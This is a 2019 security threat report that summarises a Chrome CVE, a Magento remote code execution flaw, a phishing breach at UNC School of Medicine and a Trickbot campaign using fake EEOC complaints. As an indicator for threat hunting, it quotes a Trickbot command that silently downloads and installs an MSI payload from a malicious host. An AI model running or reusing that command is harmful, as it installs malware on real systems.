Threat Report

Thursday November 14th 2019

We’re back with another edition of the usually weekly threat report. This week we’re highlighting two critical vulnerabilities, a case of business email compromise for a medical school, and a Trickbot campaign targeting U.S. government offices.

Chrome vulnerability on with YouTube demo

If you haven’t updated Chrome recently, you might want to. In early November, a critical use-after-free vulnerability was disclosed for Google Chrome (CVE-2019-13720). Earlier this week a Proof-of-Concept exploit for the vulnerability was posted on YouTube by Tony Stack.

The vulnerabilities have been patched via Chrome version 78.0.3904.87 but older versions are being actively exploited. Users on the forum have been discussing the vulnerability which shows that many threat actors want to leverage the vulnerability against out of date versions of Chrome.

On the YouTube post, user ironman, aka Tony Stack, shares the steps to exploit the Chrome vulnerability. You can get more details from Tony on and on GitHub.

Remote code execution vulnerability for Magento

E-commerce platform Magento warned its users to apply a security patch for a remote code execution vulnerability tracked CVE-2019-8144 impacting Magento 2.3 prior to 2.3.3 or 2.3.2-p.

The vulnerability could allow unauthenticated attackers to deliver malicious payloads into a merchant’s site and execute it. On October 8, 2019, Magento released a security update to address the vulnerability, but some installations remain vulnerable for users who have not applied the security update. Users are advised to update to Magento Commerce 2.3.3 and the security-only patch 2.3.2-p2 to address the vulnerability.

In addition to applying security patches, Magento also recommends checking websites and servers to see if it was potentially compromised before upgrading.

Phishing attack leads to BEC at UNC School of Medicine

Around 3,716 individuals may have been affected after a phishing and BEC incident which resulted in a data breach at the University of North Carolina School of Medicine. Some School of Medicine students fell victim to a cyber phishing incident via email accounts.

Between May 17, 2018, and June 18, 2018, an unauthorized third party was able to gain access to several email accounts that contain personal information of some patients, possibly related to treatments received in the UNC.

These email accounts contain information such as patients’ names, dates of birth, and demographic data such as addresses, health insurance information, health information, social security numbers, financial account information and/or credit card information.

Mail notifications to affected patients started being sent out on November 12, 2019. The university also offered limited monitoring and identity protection services to the affected individuals, which does not cover the lost damage to patients.

UNC School of Medicine is taking steps to prevent additional BEC compromise by adding multi-factor authentication and enrolling employees in security awareness training. There has been no mention if their UNC business practices will change to prevent sensitive patient information from being shared via email. Business processes involving sensitive information should not be conducted via email.

Trickbot lures employees with sexual harassment complaints from the EEOC

Fake sexual harassment complaints from the U.S. Equal Employment Opportunity Commission (EEOC) are the latest lure used by attackers to disseminate the Trickbot banking Trojan onto the devices of unsuspecting employees of large companies.

Based on availability data from Perch, this campaign is still very active with a first sighting on November 3rd, 2019. Based on the customers being targeted, the campaign seems mostly geared towards the financial service, education, retail, and health industries.

According to recent reports, the malware operators use information collected for each target to customize the phishing emails to look legitimate. The attackers use “Name_of_Victim – A grievance raised against you” subjects for each of the phishing emails to draw in the attention of their targets.

Additionally, the malicious attachments containing the Trickbot payloads have customized names and use the following format “Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc” to further entice the target into opening the attachment. Organizations should implement security monitoring processes to prevent, detect, and respond to phishing attacks. Enjoy some IoCs for your hunting pleasure.



IP Addresses


2nd Stage Download (through MSI)

msiexec /i http://ftpthedocgrp[.]com/backup.msi /q



Paul Scott

Paul Scott
Has 6 Gold Stars